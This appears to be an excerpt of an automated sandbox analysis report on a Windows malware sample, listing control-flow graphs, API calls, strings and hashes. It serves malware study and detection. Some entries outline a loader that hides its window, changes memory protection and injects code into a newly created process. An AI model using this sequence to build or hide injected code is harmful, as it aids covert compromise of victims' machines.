                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 0 40f174-40f1a1 call 40dfd0 call 409657 call 40af53 7 40f1a3-40f1b9 call 413be0 0->7 8 40f1be-40f1c3 0->8 14 40f413-40f418 call 40e015 7->14 10 40f1c9-40f1d0 8->10 12 40f1d2-40f201 10->12 13 40f203-40f212 GetStartupInfoW 10->13 12->10 15 40f341-40f347 13->15 16 40f218-40f21d 13->16 17 40f405-40f411 call 40f419 15->17 18 40f34d-40f35e 15->18 16->15 20 40f223-40f23a 16->20 17->14 21 40f360-40f363 18->21 22 40f373-40f379 18->22 25 40f241-40f244 20->25 26 40f23c-40f23e 20->26 21->22 27 40f365-40f36e 21->27 28 40f380-40f387 22->28 29 40f37b-40f37e 22->29 31 40f247-40f24d 25->31 26->25 32 40f3ff-40f400 27->32 33 40f38a-40f396 GetStdHandle 28->33 29->33 34 40f26f-40f277 31->34 35 40f24f-40f260 call 40af53 31->35 32->15 38 40f398-40f39a 33->38 39 40f3dd-40f3f3 33->39 37 40f27a-40f27c 34->37 44 40f2f4-40f2fb 35->44 45 40f266-40f26c 35->45 37->15 42 40f282-40f287 37->42 38->39 43 40f39c-40f3a5 GetFileType 38->43 39->32 41 40f3f5-40f3f8 39->41 41->32 46 40f2e1-40f2f2 42->46 47 40f289-40f28c 42->47 43->39 48 40f3a7-40f3b1 43->48 52 40f301-40f30f 44->52 45->34 46->37 47->46 49 40f28e-40f292 47->49 50 40f3b3-40f3b9 48->50 51 40f3bb-40f3be 48->51 49->46 53 40f294-40f296 49->53 54 40f3c6 50->54 55 40f3c0-40f3c4 51->55 56 40f3c9-40f3db InitializeCriticalSectionAndSpinCount 51->56 57 40f311-40f333 52->57 58 40f335-40f33c 52->58 59 40f2a6-40f2db InitializeCriticalSectionAndSpinCount 53->59 60 40f298-40f2a4 GetFileType 53->60 54->56 55->54 56->32 57->52 58->31 61 40f2de 59->61 60->59 60->61 61->46
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 0040F182
                                                                                                                          • Part of subcall function 00409657: __mtinitlocknum.LIBCMT ref: 00409669
                                                                                                                          • Part of subcall function 00409657: EnterCriticalSection.KERNEL32(00000000,?,004102C3,0000000D), ref: 00409682
                                                                                                                        • __calloc_crt.LIBCMT ref: 0040F193
                                                                                                                          • Part of subcall function 0040AF53: __calloc_impl.LIBCMT ref: 0040AF62
                                                                                                                          • Part of subcall function 0040AF53: Sleep.KERNEL32(00000000), ref: 0040AF79
                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0040F1AE
                                                                                                                        • GetStartupInfoW.KERNEL32(?,00425DF0,00000064,0040955E,00425B90,00000014), ref: 0040F207
                                                                                                                        • __calloc_crt.LIBCMT ref: 0040F252
                                                                                                                        • GetFileType.KERNEL32(00000001), ref: 0040F299
                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0040F2D2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1426640281-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 62 427e40-427f10 call 42705f call 427073 * 7 call 427109 CreateFileW 81 427f16-427f21 62->81 82 427fef 62->82 81->82 87 427f27-427f37 VirtualAlloc 81->87 83 427ff1-427ff6 82->83 85 427ff8 83->85 86 427ffc-428001 83->86 85->86 91 42801d-428020 86->91 87->82 88 427f3d-427f4c ReadFile 87->88 88->82 90 427f52-427f71 VirtualAlloc 88->90 94 427f73-427f86 call 4270da 90->94 95 427feb-427fed 90->95 92 428022-428027 91->92 93 428003-428007 91->93 96 428034-42803c 92->96 97 428029-428031 VirtualFree 92->97 99 428013-428015 93->99 100 428009-428011 93->100 104 427fc1-427fd1 call 427073 94->104 105 427f88-427f93 94->105 95->83 97->96 102 428017-42801a 99->102 103 42801c 99->103 100->91 102->91 103->91 104->83 110 427fd3-427fd8 104->110 106 427f96-427fbf call 4270da 105->106 106->104 112 427fda-427fdb FindCloseChangeNotification 110->112 113 427fde-427fe9 VirtualFree 110->113 112->113 113->91
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,004286D6,7FAB7E30), ref: 00427F06
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,004286D6,7FAB7E30,00428394,00000000,00000040), ref: 00427F30
                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,004286D6,7FAB7E30,00428394,00000000), ref: 00427F47
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,004286D6,7FAB7E30,00428394,00000000,00000040), ref: 00427F69
                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,004286D6,7FAB7E30,00428394,00000000,00000040,?,00000000,0000000E), ref: 00427FDB
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,004286D6,7FAB7E30,00428394,00000000,00000040,?), ref: 00427FE6
                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,004286D6,7FAB7E30,00428394,00000000,00000040,?), ref: 00428031
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 656311269-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 114 42720a-427225 call 42705f 117 427228-42722c 114->117 118 427244-427251 117->118 119 42722e-427242 117->119 120 427254-427258 118->120 119->117 121 427270-42727d 120->121 122 42725a-42726e 120->122 123 427280-427284 121->123 122->120 124 427286-42729a 123->124 125 42729c-42737a call 427073 * 8 123->125 124->123 142 427391 125->142 143 42737c-427386 125->143 145 427395-4273b1 142->145 143->142 144 427388-42738f 143->144 144->145 147 4273b3-4273b5 145->147 148 4273ba 145->148 149 427734-427737 147->149 150 4273c1-4273e9 CreateProcessW 148->150 151 4273f0-427409 Wow64GetThreadContext 150->151 152 4273eb 150->152 154 427410-42742d ReadProcessMemory 151->154 155 42740b 151->155 153 4276e8-4276ec 152->153 158 427731-427733 153->158 159 4276ee-4276f2 153->159 156 427434-42743d 154->156 157 42742f 154->157 155->153 160 427464-427483 call 428286 156->160 161 42743f-42744e 156->161 157->153 158->149 162 4276f4-4276ff 159->162 163 427705-427709 159->163 173 427485 160->173 174 42748a-4274ab call 4283a0 160->174 161->160 166 427450-427456 call 4281f1 161->166 162->163 164 427711-427715 163->164 165 42770b 163->165 169 427717 164->169 170 42771d-427721 164->170 165->164 177 42745b-42745d 166->177 169->170 175 427723-427728 call 4281f1 170->175 176 42772d-42772f 170->176 173->153 182 4274f0-427510 call 4283a0 174->182 183 4274ad-4274b4 174->183 175->176 176->149 177->160 180 42745f 177->180 180->153 190 427512 182->190 191 427517-42752c call 4270da 182->191 184 4274b6-4274e2 call 4283a0 183->184 185 4274eb 183->185 193 4274e4 184->193 194 4274e9 184->194 185->153 190->153 196 427535-42753f 191->196 193->153 194->182 197 427571-427575 196->197 198 427541-42756f call 4270da 196->198 200 427655-427671 call 42803f 197->200 201 42757b-427589 197->201 198->196 208 427673 200->208 209 427675-427696 Wow64SetThreadContext 200->209 201->200 204 
42758f-42759d 201->204 204->200 207 4275a3-4275c3 204->207 210 4275c6-4275ca 207->210 208->153 211 42769a-4276a4 call 428140 209->211 212 427698 209->212 210->200 213 4275d0-4275e5 210->213 221 4276a6 211->221 222 4276a8-4276ac 211->222 212->153 215 4275f7-4275fb 213->215 216 427638-427650 215->216 217 4275fd-427609 215->217 216->210 219 427636 217->219 220 42760b-427634 217->220 219->215 220->219 221->153 224 4276b4-4276b8 222->224 225 4276ae 222->225 226 4276c0-4276c4 224->226 227 4276ba 224->227 225->224 228 4276c6 226->228 229 4276cc-4276d0 226->229 227->226 228->229 230 4276d2-4276d7 call 4281f1 229->230 231 4276dc-4276e2 229->231 230->231 231->150 231->153
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 0-2746444292
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 233 406530-40655a GetConsoleWindow ShowWindow call 406802 236 406560-406568 233->236 237 406613-40661b 233->237 238 40656a-40657c 236->238 239 40657e-406583 236->239 238->239 240 406590-4065b4 239->240 240->240 241 4065b6-4065cc VirtualProtect 240->241 254 4065d2 call 4278b7 241->254 255 4065d2 call 427afd 241->255 242 4065d4-4065ef call 4088c5 call 402550 242->237 247 4065f1-406610 call 402470 call 402770 call 4088c5 242->247 247->237 254->242 255->242
                                                                                                                        APIs
                                                                                                                        • GetConsoleWindow.KERNELBASE(00000000), ref: 0040653C
                                                                                                                        • ShowWindow.USER32(00000000), ref: 00406543
                                                                                                                        • VirtualProtect.KERNELBASE(00427000,00001729,00000040,?), ref: 004065C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ConsoleProtectShowVirtual
                                                                                                                        • String ID: ddser.bmp$rtertert.bmp
                                                                                                                        • API String ID: 2391285285-2540923277
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(00427000,00001729,00000040,?), ref: 004065C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID: ddser.bmp$rtertert.bmp
                                                                                                                        • API String ID: 544645111-2540923277
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 0040724F
                                                                                                                          • Part of subcall function 0040B126: __FF_MSGBANNER.LIBCMT ref: 0040B13D
                                                                                                                          • Part of subcall function 0040B126: __NMSG_WRITE.LIBCMT ref: 0040B144
                                                                                                                          • Part of subcall function 0040B126: RtlAllocateHeap.NTDLL(00700000,00000000,00000001,00000001,?,?,?,0040887C,00000001,00000000,?,?,?,004087B6,00406914,00000000), ref: 0040B169
                                                                                                                        • std::exception::exception.LIBCMT ref: 0040726B
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00407280
                                                                                                                          • Part of subcall function 004088F0: RaiseException.KERNEL32(00000001,0042876C,)i@,?,?,?,?,?,00406929,?,004259A0,?), ref: 00408941
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3074076210-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004277DA: GetSystemInfo.KERNELBASE(?), ref: 004277F7
                                                                                                                        • VirtualAllocExNuma.KERNELBASE(00000000), ref: 0042789D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocInfoNumaSystemVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 449148690-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00427777
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • _memset.LIBCMT ref: 00419BD4
                                                                                                                        • _TranslateName.LIBCMT ref: 00419C1F
                                                                                                                        • _TranslateName.LIBCMT ref: 00419C6A
                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,00000055), ref: 00419CB7
                                                                                                                          • Part of subcall function 0040D4A3: _wcsnlen.LIBCMT ref: 0040D4E4
                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00419D0B
                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00419D1E
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 00419D71
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00419D88
                                                                                                                        • __itow_s.LIBCMT ref: 00419D9A
                                                                                                                          • Part of subcall function 0041CE1A: _xtow_s@20.LIBCMT ref: 0041CE3C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoNameTranslateValid$CodeDefaultPageUser__getptd_noexit__itow_s_memset_wcsnlen_xtow_s@20
                                                                                                                        • String ID: THB
                                                                                                                        • API String ID: 1039567946-881244879
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • _wcscmp.LIBCMT ref: 00419AA0
                                                                                                                        • _wcscmp.LIBCMT ref: 00419AB1
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00419CE3,?,00000000), ref: 00419ACD
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00419CE3,?,00000000), ref: 00419AF7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale_wcscmp
                                                                                                                        • String ID: ACP$OCP
                                                                                                                        • API String ID: 1351282208-711371036
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 004197C7
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 00419814
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 004198C4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale$__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1862418609-0
                                                                                                                        • Opcode ID: 130bcfcde72d26cb531dc9744c7a3a6c44b22305e0d00254d6708e9606cb4827
                                                                                                                        • Instruction ID: 434fc6184cf633b4ef41587483370f3f5e9e4864e40cab67f9712fb763d73883
                                                                                                                        • Opcode Fuzzy Hash: 130bcfcde72d26cb531dc9744c7a3a6c44b22305e0d00254d6708e9606cb4827
                                                                                                                        • Instruction Fuzzy Hash: 7B51CEB15202129FEB289F25C9A2BE777A8EF01314F14807FE80486295E778DDC4CB59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • _GetPrimaryLen.LIBCMT ref: 004196B9
                                                                                                                        • EnumSystemLocalesW.KERNEL32(0041976E,00000001,000000A0,?,?,00419C8C,00000000,?,?,?,?,?,00000055), ref: 004196C9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLocalesPrimarySystem__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1605451767-0
                                                                                                                        • Opcode ID: 3bb30db2ef1d526fd1d5d6bec617feceee6898feec64f8f3229eb19ccdd60e5d
                                                                                                                        • Instruction ID: 95b7eb465541007cd52e0dcbbef15b0a39f70f74404222b4d4f99a2491b3b091
                                                                                                                        • Opcode Fuzzy Hash: 3bb30db2ef1d526fd1d5d6bec617feceee6898feec64f8f3229eb19ccdd60e5d
                                                                                                                        • Instruction Fuzzy Hash: 1C018432550307DEE720AF35D509BA6BBE0EF00715F10492FE455961D1D7BD6894CB5C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00419930,00000000,00000000,?), ref: 00419B60
                                                                                                                        • _GetPrimaryLen.LIBCMT ref: 00419B7F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocalePrimary__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3580725100-0
                                                                                                                        • Opcode ID: 23e04a040d014c38e04e34f044347def2a89ed91a59f772837733b81ce5752ac
                                                                                                                        • Instruction ID: 511fc75ee5418908e0dc47367957947d5d5876091e72ca5d96b98d8d5db6f4ed
                                                                                                                        • Opcode Fuzzy Hash: 23e04a040d014c38e04e34f044347def2a89ed91a59f772837733b81ce5752ac
                                                                                                                        • Instruction Fuzzy Hash: D4F0F672A24110BAEF145631DC55FEE7698FB40754F10403BE905A2181EA7CBD8086A8
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004101F3: __getptd_noexit.LIBCMT ref: 004101F4
                                                                                                                        • _GetPrimaryLen.LIBCMT ref: 0041971D
                                                                                                                        • EnumSystemLocalesW.KERNEL32(00419961,00000001,?,?,00419C56,004124A7,?,?,00000055,?,?,004124A7,?,?,?), ref: 00419730
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1377385430.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1377371770.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377407672.000000000041E000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377423905.0000000000427000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1377451962.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_btpqr.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnumLocalesPrimarySystem__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1605451767-0
                                                                                                                        • Opcode ID: 3279a64362fc5fbdd227c4b0dc2d9144a5606f94edbfd9555c99a191eefdfeb6
                                                                                                                        • Instruction ID: 3091879ea61ce8d73b87c087e928a090a2300d9e2469dd7eeb4f9252f5dc3132
                                                                                                                        • Opcode Fuzzy Hash: 3279a64362fc5fbdd227c4b0dc2d9144a5606f94edbfd9555c99a191eefdfeb6
                                                                                                                        • Instruction Fuzzy Hash: 27F08271564305EAD7206E35EC55BE17B94DF05750F10442AF859861D2C6B95C808668
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,0040E2C3,?,?,?,00000001), ref: 0040B8B3
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0040B8BC
                                                                                                                        Memory Dump Source
